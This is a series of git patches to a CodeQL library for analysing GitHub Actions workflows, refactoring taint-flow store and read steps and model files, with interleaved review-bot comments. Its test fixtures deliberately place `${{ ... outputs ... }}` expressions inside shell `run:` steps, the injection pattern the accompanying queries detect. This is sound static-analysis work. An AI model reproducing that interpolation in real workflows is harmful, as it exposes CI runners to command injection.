"${{steps.summary.outputs.value}}" + - id: no-flow + run: | + echo "${{steps.summary.outputs.foo}}" diff --git a/ql/src/test/.github/workflows/simple2.yml b/ql/src/test/.github/workflows/simple2.yml index f3d79b97bc2d..b40f5eb6ac05 100644 
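Review bot: The new `no-flow` step in simple1.yml reads `steps.summary.outputs.foo`, and nothing in the fixture says why that is expected not to flow; the reason appears to be that the mad9000 summary model declares only a `value` output, which lives in a different file. A YAML comment on the step, e.g. `# no flow expected: 'foo' is not a modelled output of mad9000/actions-find-and-replace-string`, would make the fixture self-describing.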
--- a/ql/src/test/.github/workflows/simple2.yml +++ b/ql/src/test/.github/workflows/simple2.yml @@ -33,4 +33,10 @@ jobs: echo "$file was changed" done + - name: List all changed files + id: no-flow + run: | + for file in ${{ steps.source.outputs.all_changed_files_count }}; do + echo "$file was changed" + done diff --git a/ql/src/test/.github/workflows/test.yml b/ql/src/test/.github/workflows/test.yml index 554a09f21059..628b6e6f1bf5 100644 --- a/ql/src/test/.github/workflows/test.yml +++ b/ql/src/test/.github/workflows/test.yml @@ -22,7 +22,9 @@ jobs: run: | Write-Output "::set-output name=MSG::$ENV{BODY}" - id: step2 - run: echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" + env: + MSG: ${{steps.step1.outputs.MSG}} + run: echo "test=$MSG" >> "$GITHUB_OUTPUT" job2: runs-on: ubuntu-latest @@ -32,5 +34,4 @@ jobs: needs: job1 steps: - - env: - run: echo ${{needs.job1.outputs.job_output}} + - run: echo ${{needs.job1.outputs.job_output}} From ebaac5f5cb16ec9aba60e2fdc75bba13b08811ab Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 14:03:11 +0100 Subject: [PATCH 030/707] fix: enforce input,output,env prefixes in MaD --- .../codeql/actions/dataflow/ExternalFlow.qll | 26 +++++++++++-------- ql/lib/ext/PLACEHOLDER.model.yml | 7 +++++ .../frabert_replace-string-action.model.yml | 4 +-- ..._actions-find-and-replace-string.model.yml | 4 +-- 4 files changed, 26 insertions(+), 15 deletions(-) create mode 100644 ql/lib/ext/PLACEHOLDER.model.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 38b964110c73..6446fbb55728 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
@@ -50,22 +50,22 @@ predicate externallyDefinedSource(DataFlow::Node source, string sourceType, stri ) and ( if fieldName.trim().matches("env.%") - then source.asExpr() = uses.getEnvExpr(fieldName.trim().replaceAll("env\\.", "")) + then source.asExpr() = uses.getEnvExpr(fieldName.trim().replaceAll("env.", "")) else if fieldName.trim().matches("output.%") - then - // 'output.' is the default qualifier - source.asExpr() = uses + then source.asExpr() = uses else none() ) and sourceType = kind ) } -predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { +predicate externallyDefinedStoreStep( + DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c +) { exists(UsesExpr uses, string action, string version, string input, string output | - c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and summaryModel(action, version, input, output, "taint") and + c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" @@ -74,10 +74,11 @@ predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ, Dat ) and ( if input.trim().matches("env.%") - then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", "")) + then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) else - // 'input.' is the default qualifier - pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", "")) + if input.trim().matches("input.%") + then pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + else none() ) and succ.asExpr() = uses ) 
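Review bot: In `externallyDefinedStoreStep` the output column is not checked for the `output.` prefix the commit title says it enforces: `c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", ""))` accepts an unprefixed name unchanged, whereas the `input` side in the `@@ -74,10 +74,11 @@` hunk and the sink in the `@@ -87,8 +88,11 @@` hunk now fall through to `none()`; adding `output.trim().matches("output.%") and` before that line makes the three predicates agree. Separately, `replaceAll("env.", "")`, `replaceAll("input.", "")` and `replaceAll("output.", "")` remove every occurrence of the substring rather than only the leading qualifier, so a name that happens to contain the qualifier text again, such as `output.myoutput.list` (constructed example), collapses to `mylist`; `regexpReplaceAll("^output\\.", "")`, or `suffix(7)` once the `matches` check has held, strips exactly the prefix. The same replaceAll pattern appears in all three hunks, so the fix applies to each.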
@@ -87,8 +88,11 @@ predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { exists(UsesExpr uses, string action, string version, string input | ( if input.trim().matches("env.%") - then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("input\\.", "")) - else sink.asExpr() = uses.getArgumentExpr(input.trim()) + then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) + else + if input.trim().matches("input.%") + then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + else none() ) and sinkModel(action, version, input, kind) and uses.getCallee() = action.toLowerCase() and diff --git a/ql/lib/ext/PLACEHOLDER.model.yml b/ql/lib/ext/PLACEHOLDER.model.yml new file mode 100644 index 000000000000..ef916067967d --- /dev/null +++ b/ql/lib/ext/PLACEHOLDER.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sinkModel + data: + - ["","","",""] + diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 76ce81b394e4..79fd5c76e4ae 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - ["frabert/replace-string-action", "*", "string", "replaced", "taint"] - - ["frabert/replace-string-action", "*", "replace-with", "replaced", "taint"] + - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint"] + - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint"] diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 46a577d2f7e2..332527813a41 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml 
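Review bot: PLACEHOLDER.model.yml adds a `sinkModel` row of four empty strings with no comment saying why it exists; it looks like a stub so the extensible predicate has at least one definition, but that is a guess from the file name. A YAML comment at the top of the file, e.g. `# Placeholder row so the sinkModel extensible predicate is populated; replace with real sink models.`, would record the intent. Because `externallyDefinedSink` only matches `env.`- or `input.`-qualified inputs, the empty row cannot produce a sink on its own, which is worth stating in that comment as well.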
@@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - ["mad9000/actions-find-and-replace-string", "*", "source", "value", "taint"] - - ["mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint"] \ No newline at end of file + - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint"] + - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint"] From 494fb2470e1c399699b4dab1176ac573f9947ac2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 14:05:13 +0100 Subject: [PATCH 031/707] fix: refactor local, read and store steps --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 74 ++++++------------- 2 files changed, 22 insertions(+), 54 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 9def461900eb..faa7c4c3ebeb 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -40,7 +40,7 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $TAINTED)" >> $GITHUB_OUTPUT * echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" */ -predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { +predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(RunExpr r, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and r.getEnvExpr(varName) = pred.asExpr() and diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 55fda0387894..045910ed6760 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
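Review bot: The renamed `runEnvToScriptStoreStep` still computes its content name with `output.replaceAll("output\\.", "")` on the context line directly below the signature; `replaceAll` in QL is a literal replacement, so this searches for the characters `output\.` and strips nothing, which is exactly what the previous commit corrected in ExternalFlow.qll. If `output` carries the `output.` qualifier here, the resulting field name keeps the prefix and will never match the `TFieldContent` names read back through `StepsCtxAccessExpr.getFieldName()`; `output.regexpReplaceAll("^output\\.", "")` (or the same `replaceAll("output.", "")` form ExternalFlow.qll now uses) fixes it. Confirm against the rest of the predicate, whose body continues outside the hunk.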
@@ -133,9 +133,9 @@ predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } newtype TContent = TFieldContent(string name) { + // We only use field flow for steps and jobs outputs, not for accessing other context fields such as jobs, env or inputs name = any(StepsCtxAccessExpr a).getFieldName() or - name = any(NeedsCtxAccessExpr a).getFieldName() or - name = any(JobsCtxAccessExpr a).getFieldName() + name = any(NeedsCtxAccessExpr a).getFieldName() } /** @@ -188,11 +188,12 @@ class ArgumentPosition extends string { predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } /** - * Holds if there is a local flow step between a ${{}} expression accesing a step output variable and the step output itself - * But only for those cases where the step output is defined externally in a MaD specification. - * The reason for this is that we don't currently have a way to specify that a source starts with a non-empty access - * path so the easiest thing is to add the corresponding read steps of that field as local flow steps as well. - * e.g. ${{ steps.step1.output.foo }} + * Holds if there is a local flow step between a ${{ steps.xxx.outputs.yyy }} expression accesing a step output field + * and the step output itself. But only for those cases where the step output is defined externally in a MaD Source + * specification. The reason for this is that we don't currently have a way to specify that a source starts with a + * non-empty access path so we cannot write a Source that stores the taint in a Content, we can only do that for steps + * (storeStep). The easiest thing is to add this local flow step that simulates a read step from the source node for a specific + * field name. */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(StepStmt astFrom, StepsCtxAccessExpr astTo | 
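Review bot: The rewritten doc comment on `stepsCtxLocalStep` in the `@@ -188,11 +188,12 @@` hunk spells `accesing` and runs one sentence across five lines; something like `Holds if there is a local flow step from a step's UsesExpr to a ${{ steps.xxx.outputs.yyy }} expression accessing one of its outputs, but only when that output is declared as a source in a MaD model. Sources cannot currently carry a non-empty access path, so this local step stands in for the read of that field.` keeps the meaning and fixes the typo. The predicate's body continues past the end of the hunk.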
@@ -204,19 +205,6 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { ) } -/** - * Holds if there is a local flow step between a ${{}} expression accesing a job output variable and the job output itself - * e.g. ${{ needs.job1.output.foo }} or ${{ jobs.job1.output.foo }} - */ -predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, CtxAccessExpr astTo | - astFrom = nodeFrom.asExpr() and - astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom and - (astTo instanceof NeedsCtxAccessExpr or astTo instanceof JobsCtxAccessExpr) - ) -} - /** * Holds if there is a local flow step between a ${{}} expression accesing an input variable and the input itself * e.g. ${{ inputs.foo }} @@ -252,7 +240,6 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { stepsCtxLocalStep(nodeFrom, nodeTo) or - jobsCtxLocalStep(nodeFrom, nodeTo) or inputsCtxLocalStep(nodeFrom, nodeTo) or envCtxLocalStep(nodeFrom, nodeTo) } @@ -272,17 +259,12 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr */ predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } -/** - * A read step to read the value of a ReusableWork uses step and connect it to its - * corresponding JobOutputAccessExpr - */ -predicate reusableWorkflowReturnReadStep(Node node1, Node node2, ContentSet c) { - exists(NeedsCtxAccessExpr expr, string fieldName | - expr.usesReusableWorkflow() and - expr.getRefExpr() = node1.asExpr() and - expr.getFieldName() = fieldName and - expr = node2.asExpr() and - c = any(FieldContent ct | ct.getName() = fieldName) +predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { + exists(CtxAccessExpr access | + (access instanceof NeedsCtxAccessExpr or access instanceof StepsCtxAccessExpr) and + c = any(FieldContent ct | ct.getName() = access.getFieldName()) and + node1.asExpr() = access.getRefExpr() and + node2.asExpr() = access ) } 
@@ -291,24 +273,14 @@ predicate reusableWorkflowReturnReadStep(Node node1, Node node2, ContentSet c) { * `node1` references an object with a content `c.getAReadContent()` whose * value ends up in `node2`. */ -predicate readStep(Node node1, ContentSet c, Node node2) { - // TODO: Extract to its own predicate - exists(StepsCtxAccessExpr access | - c = any(FieldContent ct | ct.getName() = access.getFieldName()) and - node1.asExpr() = access.getRefExpr() and - node2.asExpr() = access - ) - or - reusableWorkflowReturnReadStep(node1, node2, c) -} +predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node1, node2, c) } /** - * A store step to store the value of a ReusableWorkflowStmt output expr into the return node (node2) + * A store step to store an output expression (node1) into its OutputsStm node (node2) * with a given access path (fieldName) */ -predicate reusableWorkflowReturnStoreStep(Node node1, Node node2, ContentSet c) { - exists(ReusableWorkflowStmt stmt, OutputsStmt out, string fieldName | - out = stmt.getOutputsStmt() and +predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { + exists(OutputsStmt out, string fieldName | node1.asExpr() = out.getOutputExpr(fieldName) and node2.asExpr() = out and c = any(FieldContent ct | ct.getName() = fieldName) @@ -321,13 +293,9 @@ predicate reusableWorkflowReturnStoreStep(Node node1, Node node2, ContentSet c) * contains the value of `node1`. */ predicate storeStep(Node node1, ContentSet c, Node node2) { - reusableWorkflowReturnStoreStep(node1, node2, c) - or - // TODO: rename to xxxxStoreStep - externallyDefinedSummary(node1, node2, c) - or - // TODO: rename to xxxxStoreStep - runEnvToScriptstep(node1, node2, c) + fieldStoreStep(node1, node2, c) or + externallyDefinedStoreStep(node1, node2, c) or + runEnvToScriptStoreStep(node1, node2, c) } /** From 90d1ae4a05208f1b6a7c1b16f860e72b232288c3 Mon Sep 17 00:00:00 2001 
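Review bot: The new doc comment on `fieldStoreStep` in the `@@ -291,24 +273,14 @@` hunk reads `its OutputsStm node (node2)`; the class is `OutputsStmt`, so the intended line is ` * A store step to store an output expression (node1) into its OutputsStmt node (node2)`. It is also worth saying explicitly that the predicate now fires for any `OutputsStmt`, not only those of a reusable workflow, since the former name `reusableWorkflowReturnStoreStep` was narrower and readers of the call site in `storeStep` will otherwise assume the old scope.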
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 14:06:28 +0100 Subject: [PATCH 032/707] fix: simplify Ast --- ql/lib/codeql/actions/Ast.qll | 30 +++---------------- .../actions/controlflow/internal/Cfg.qll | 6 +--- 2 files changed, 5 insertions(+), 31 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 087b7f19e626..e5f9e35a4a9b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -149,7 +149,7 @@ class JobStmt extends Statement instanceof Actions::Job { * out1: ${steps.foo.bar} * out2: ${steps.foo.baz} */ - JobOutputStmt getOutputStmt() { result = this.(Actions::Job).lookup("outputs") } + OutputsStmt getOutputsStmt() { result = this.(Actions::Job).lookup("outputs") } /** * Reusable workflow jobs may have Uses children @@ -166,28 +166,6 @@ class JobStmt extends Statement instanceof Actions::Job { } } -/** - * Declaration of the outputs for the job. - * eg: - * out1: ${steps.foo.bar} - * out2: ${steps.foo.baz} - */ -class JobOutputStmt extends Statement instanceof YamlMapping { - JobStmt job; - - JobOutputStmt() { job.(YamlMapping).lookup("outputs") = this } - - YamlMapping asYamlMapping() { result = this } - - /** - * Gets a specific value expression - * eg: ${steps.foo.bar} - */ - Expression getOutputExpr(string id) { - this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = id), result) - } -} - /** * A Step is a single task that can be executed as part of a job. */ @@ -435,9 +413,9 @@ class NeedsCtxAccessExpr extends CtxAccessExpr { job.getLocation().getFile() = this.getLocation().getFile() and ( // regular jobs - job.getOutputStmt().getOutputExpr(fieldName) = result + job.getOutputsStmt() = result or - // jobs calling reusable workflows + // reusable workflow calling jobs job.getUsesExpr() = result ) } 
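Review bot: The comment rewritten in the `@@ -435,9 +413,9 @@` hunk, `// reusable workflow calling jobs`, reads as "a reusable workflow that calls jobs", which is the opposite of what the branch matches (`job.getUsesExpr()` — a job whose `uses:` calls a reusable workflow). `// jobs that call a reusable workflow (uses:)` keeps the original meaning. The rest of `NeedsCtxAccessExpr` is outside the hunk.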
@@ -464,7 +442,7 @@ class JobsCtxAccessExpr extends CtxAccessExpr { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - job.getOutputStmt().getOutputExpr(fieldName) = result + job.getOutputsStmt() = result ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8d044c827a28..8808fb0afe53 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -231,7 +231,7 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { rank[i](Expression child, Location l | ( child = super.getAStepStmt() or - child = super.getOutputStmt() or + child = super.getOutputsStmt() or child = super.getUsesExpr() ) and l = child.getLocation() @@ -243,10 +243,6 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { } } -private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStmt { - override ControlFlowTree getChildNode(int i) { result = super.asYamlMapping().getValueNode(i) } -} - private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr { override ControlFlowTree getChildNode(int i) { result = From f65587e5cfa8b9d00dcb91d98df4a720bcc384a1 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 17:08:13 +0100 Subject: [PATCH 033/707] feat(fieldflow): Refactor flow through Job outputs MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Job output should flow to the “key†(YamlString) and be read from there from the JobOutputAccessExpr. - NeedsCtxAccessExpr.getRefExpr should point to the UsesExpr(RW calling Job) or to the OutputsStmt(Regular Job). - JobsCtxAccessExpr.getRefExpr should point to the OutputsStmt(Regular Job). - Create storeStep from OutputExpr to OutputStmt using output var name as the field name. - Create a readStep for CtxAccessExpr to read the referenced fields from the job outputs. --- .../dataflow/internal/DataFlowPrivate.qll | 23 +++++++++++++------ 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 045910ed6760..12be2d899984 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -133,9 +133,10 @@ predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } newtype TContent = TFieldContent(string name) { - // We only use field flow for steps and jobs outputs, not for accessing other context fields such as jobs, env or inputs + // We only use field flow for steps and jobs outputs, not for accessing other context fields such as env or inputs name = any(StepsCtxAccessExpr a).getFieldName() or - name = any(NeedsCtxAccessExpr a).getFieldName() + name = any(NeedsCtxAccessExpr a).getFieldName() or + name = any(JobsCtxAccessExpr a).getFieldName() } /** 
@@ -196,9 +197,8 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = * field name. */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(StepStmt astFrom, StepsCtxAccessExpr astTo | + exists(UsesExpr astFrom, StepsCtxAccessExpr astTo | externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and - astFrom instanceof UsesExpr and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -259,9 +259,16 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr */ predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } +/** + * Holds if a CtxAccessExpr reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) + */ predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { exists(CtxAccessExpr access | - (access instanceof NeedsCtxAccessExpr or access instanceof StepsCtxAccessExpr) and + ( + access instanceof NeedsCtxAccessExpr or + access instanceof StepsCtxAccessExpr or + access instanceof JobsCtxAccessExpr + ) and c = any(FieldContent ct | ct.getName() = access.getFieldName()) and node1.asExpr() = access.getRefExpr() and node2.asExpr() = access 
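Review bot: The new doc comment above `ctxFieldReadStep`, `Holds if a CtxAccessExpr reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname)`, is hard to parse; `Holds if node2 is a needs/jobs/steps context access that reads the output field named by c from the job or step referenced by node1.` states the same contract in one sentence. The predicate body continues past the end of the hunk.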
@@ -272,12 +279,13 @@ predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, * `node1` references an object with a content `c.getAReadContent()` whose * value ends up in `node2`. + * Store steps without corresponding reads are pruned aggressively very early, since they can never contribute to a complete path. */ predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node1, node2, c) } /** - * A store step to store an output expression (node1) into its OutputsStm node (node2) - * with a given access path (fieldName) + * Stores an output expression (node1) into its OutputsStm node (node2) + * using the output variable name as the access path */ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { exists(OutputsStmt out, string fieldName | @@ -291,6 +299,7 @@ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { * Holds if data can flow from `node1` to `node2` via a store into `c`. Thus, * `node2` references an object with a content `c.getAStoreContent()` that * contains the value of `node1`. + * Store steps without corresponding reads are pruned aggressively very early, since they can never contribute to a complete path. */ predicate storeStep(Node node1, ContentSet c, Node node2) { fieldStoreStep(node1, node2, c) or From 3c12e43d3fa1c5ae4fc878aab68540b15172b69b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 18:09:12 +0100 Subject: [PATCH 034/707] feat(composite-actions): Fix summary and source queries for composite actions analysis --- .../dataflow/internal/DataFlowPrivate.qll | 25 ------------------- .../dataflow/internal/DataFlowPublic.qll | 25 +++++++++++++++++++ .../CWE-020/CompositeActionSummaries.ql | 2 -- .../CWE-020/CompositeActionsSources.ql | 8 +++++- 4 files changed, 32 insertions(+), 28 deletions(-) 
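Review bot: The sentence added to the `readStep` doc comment, `Store steps without corresponding reads are pruned aggressively very early, since they can never contribute to a complete path.`, is repeated verbatim on `storeStep` below, and on `readStep` it describes the other predicate without saying what the reader should do about it. On `readStep` I would state the requirement it implies: ` * Every content written by storeStep needs a matching read here; store steps without a corresponding read are pruned very early, since they can never complete a path.` The reworded `fieldStoreStep` comment also keeps the typo `OutputsStm` for `OutputsStmt`, and the body of `fieldStoreStep` runs past the end of the hunk.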
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 12be2d899984..89f31983189a 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -139,31 +139,6 @@ newtype TContent = name = any(JobsCtxAccessExpr a).getFieldName() } -/** - * A reference contained in an object. Examples include instance fields, the - * contents of a collection object, the contents of an array or pointer. - */ -class Content extends TContent { - /** Gets the type of the contained data for the purpose of type pruning. */ - DataFlowType getType() { any() } - - /** Gets a textual representation of this element. */ - abstract string toString(); - - /** - * Holds if this element is at the specified location. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `filepath`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ - predicate hasLocationInfo( - string filepath, int startline, int startcolumn, int endline, int endcolumn - ) { - filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 - } -} - predicate forceHighPrecision(Content c) { c instanceof FieldContent } class ContentApprox = ContentSet; diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 52101c7e5a77..8b62cccf30af 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll 
@@ -130,6 +130,31 @@ class ContentSet instanceof Content { } } +/** + * A reference contained in an object. Examples include instance fields, the + * contents of a collection object, the contents of an array or pointer. + */ +class Content extends TContent { + /** Gets the type of the contained data for the purpose of type pruning. */ + DataFlowType getType() { any() } + + /** Gets a textual representation of this element. */ + abstract string toString(); + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 + } +} + /** A field of an object, for example an instance variable. */ class FieldContent extends Content, TFieldContent { private string name; diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql index 00a70eeed2fb..875492644b85 100644 --- a/ql/src/Security/CWE-020/CompositeActionSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -17,12 +17,10 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - source instanceof DataFlow::ParameterNode and exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - sink instanceof DataFlow::ReturnNode and exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) } } 
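Review bot: `isSink` is now identical to the one in `CompositeActionsSources.ql` from the same commit, but only that query overrides `allowImplicitRead` to permit `FieldContent` reads at the sink; if that override is what lets a value stored under an output field by `fieldStoreStep` reach the output expression, this summaries query will miss the same paths. Either add the same override here or note in `MyConfig` why summaries do not need it. A short comment on `isSource`/`isSink` saying that input and output expressions are deliberately matched without the `ParameterNode`/`ReturnNode` conjuncts this commit removes would also stop a later reader from re-adding them.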
diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index f67811b3f5fa..19c43ad30661 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -23,9 +23,15 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - sink instanceof DataFlow::ReturnNode and exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) } + + predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { + allowImplicitRead(node, set) + or + isSink(node) and + set instanceof DataFlow::FieldContent + } } module MyFlow = TaintTracking::Global; From 1cd32195a7f807d4a63d25ca13946b0d4de657d4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 15 Feb 2024 11:51:28 +0100 Subject: [PATCH 035/707] feat(bash-step): Improve bash step accuracy Only pass the taint when the env var is directlty set as the step output --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 16 +++--------- .../Security/CWE-094/ExpressionInjection.ql | 3 +-- .../workflows/image_link_generator.yml | 26 +++---------------- 3 files changed, 8 insertions(+), 37 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index faa7c4c3ebeb..bc0c782e9ff0 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -21,11 +21,6 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -// private class RunEnvToScriptStep extends AdditionalTaintStep { -// override predicate step(DataFlow::Node pred, DataFlow::Node succ) { -// runEnvToScriptstep(pred, succ) -// } -// } /** * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. * e.g. 
